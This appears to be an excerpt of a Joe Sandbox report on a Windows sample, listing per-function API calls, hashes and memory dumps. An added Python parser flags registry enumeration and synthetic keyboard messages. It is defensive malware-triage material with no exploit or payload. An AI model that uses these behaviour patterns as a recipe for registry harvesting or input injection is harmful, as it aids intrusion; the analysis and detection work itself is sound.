                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2737351978-0
                                                                                                                    • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                    • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                    • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                                    • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                    APIs
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                                    • __calloc_crt.LIBCMT ref: 00415246
                                                                                                                    • __getptd.LIBCMT ref: 00415253
                                                                                                                    • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                                    • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                                    • _free.LIBCMT ref: 0041529E
                                                                                                                    • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3638380555-0
                                                                                                                    • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                    • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                                                    • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                                                    • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Copy$ClearErrorInitLast
                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 3207048006-625585964
                                                                                                                    • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                    • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                                                                                                    • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                                                                                                    • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                      • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                    • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                    • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                    • _memmove.LIBCMT ref: 004656CA
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                    • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2945290962-0
                                                                                                                    • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                    • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                    • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                    • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                    APIs
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                                                                    • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                                                                    • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                                                                    • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                                                                    • String ID:
• API String ID: 1457242333-0
• Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
• Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
• Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
• Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
APIs
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ConnectRegistry_memmove_wcslen
• String ID:
• API String ID: 15295421-0
• Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
• Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
• Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• _wcstok.LIBCMT ref: 004675B2
  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcscpy.LIBCMT ref: 00467641
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcslen.LIBCMT ref: 004677BD
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
• String ID: X
• API String ID: 780548581-3081909835
• Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
• Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
• Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
• Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
• MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
• AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
• LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
• CloseFigure.GDI32(?), ref: 0044751F
• SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
• Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
• Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
• Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
• String ID:
• API String ID: 2027346449-0
• Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
• Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
• Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
• Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• _wcslen.LIBCMT ref: 0047A79E
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
• String ID:
• API String ID: 3257027151-0
• Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
• Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
• Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
• Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
• WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ErrorLastselect
• String ID:
• API String ID: 215497628-0
• Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
• Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
• Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
• Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
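Reports of this kind run to thousands of per-function records, and the call chains that matter for triage (a registry connect/open/enumerate sequence, synthetic WM_KEYUP posts for modifier keys, file dialogs opened with a 0x58-byte OPENFILENAMEW) are spread across them. The following is an added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for the "APIs" lines in the shape shown in these records (bullet, optional "Part of subcall function XXXXXXXX:" prefix, Api.MODULE(args), ref: address), plus two checks over the parsed calls. The regular expression is derived only from the line shapes visible here and is an assumption about the general format; the message and virtual-key constants are standard Windows SDK values; the sample input is constructed to mirror entries in this section.

```python
"""Parse Joe Sandbox per-function API listings and flag notable call sequences.

Added example; assumes the line shapes seen in the report, e.g.
  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • GetMenu.USER32 ref: 0047A703
"""
import re

# One API line: optional subcall prefix, Api.MODULE, optional (args), ref: address.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<callee>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Windows SDK constants (not taken from the report).
WM_NAMES = {0x101: "WM_KEYUP", 0x111: "WM_COMMAND"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


def parse_arg(tok):
    """'?' means the plugin could not resolve the argument; otherwise signed hex."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    return int(tok, 16)  # handles '-00000001' and 'FFFFFFFE'


def parse_apis(text):
    """Return one dict per API line: api, module, args, ref (int), callee (str or None)."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["module"], "args": args,
                      "ref": int(m["ref"], 16), "callee": m["callee"]})
    return calls


def decode_post_message(call):
    """Name the message (and key, for WM_KEYUP) of a PostMessageW call, or None."""
    if call["api"] not in ("PostMessageW", "SendMessageW") or len(call["args"]) < 3:
        return None
    msg, wparam = call["args"][1], call["args"][2]
    if msg is None:
        return None
    name = WM_NAMES.get(msg, "WM_0x%X" % msg)
    if name == "WM_KEYUP" and wparam is not None:
        return name + " " + VK_NAMES.get(wparam, "VK_0x%X" % wparam)
    return name


def has_registry_enumeration(calls):
    """True when the function itself (not a callee) connects to a registry,
    opens a key and enumerates values, in that address order."""
    own = [c for c in calls if c["callee"] is None]
    refs = []
    for api in ("RegConnectRegistryW", "RegOpenKeyExW", "RegEnumValueW"):
        hits = [c["ref"] for c in own if c["api"] == api]
        if not hits:
            return False
        refs.append(min(hits))
    return refs == sorted(refs)


def modifier_keyups(calls):
    """Virtual-key names released via PostMessageW(hwnd, WM_KEYUP, vk, ...)."""
    out = []
    for c in calls:
        d = decode_post_message(c)
        if d and d.startswith("WM_KEYUP "):
            out.append(d.split(" ", 1)[1])
    return out


# Constructed sample in the report's format (mirrors records in this section).
REGISTRY_FUNC = """
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
"""

KEYBOARD_FUNC = """
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
• GetMenu.USER32 ref: 0047A703
"""

if __name__ == "__main__":
    print(has_registry_enumeration(parse_apis(REGISTRY_FUNC)))  # True
    print(modifier_keyups(parse_apis(KEYBOARD_FUNC)))          # [VK_SHIFT, VK_CONTROL, VK_MENU, VK_LWIN]
```

Subcall entries are kept but tagged with their callee address so a check can decide whether to count APIs the function reaches only indirectly; the registry check deliberately ignores them, since a helper that merely calls _wcslen should not make every caller look like a registry harvester. The address ordering test is a cheap proxy for control flow and will miss sequences that are reordered by the compiler or split across functions.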
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 0044443B
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                    • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 87235514-0
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00444633
                                                                                                                    • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                    • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                    • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                    • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                    • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
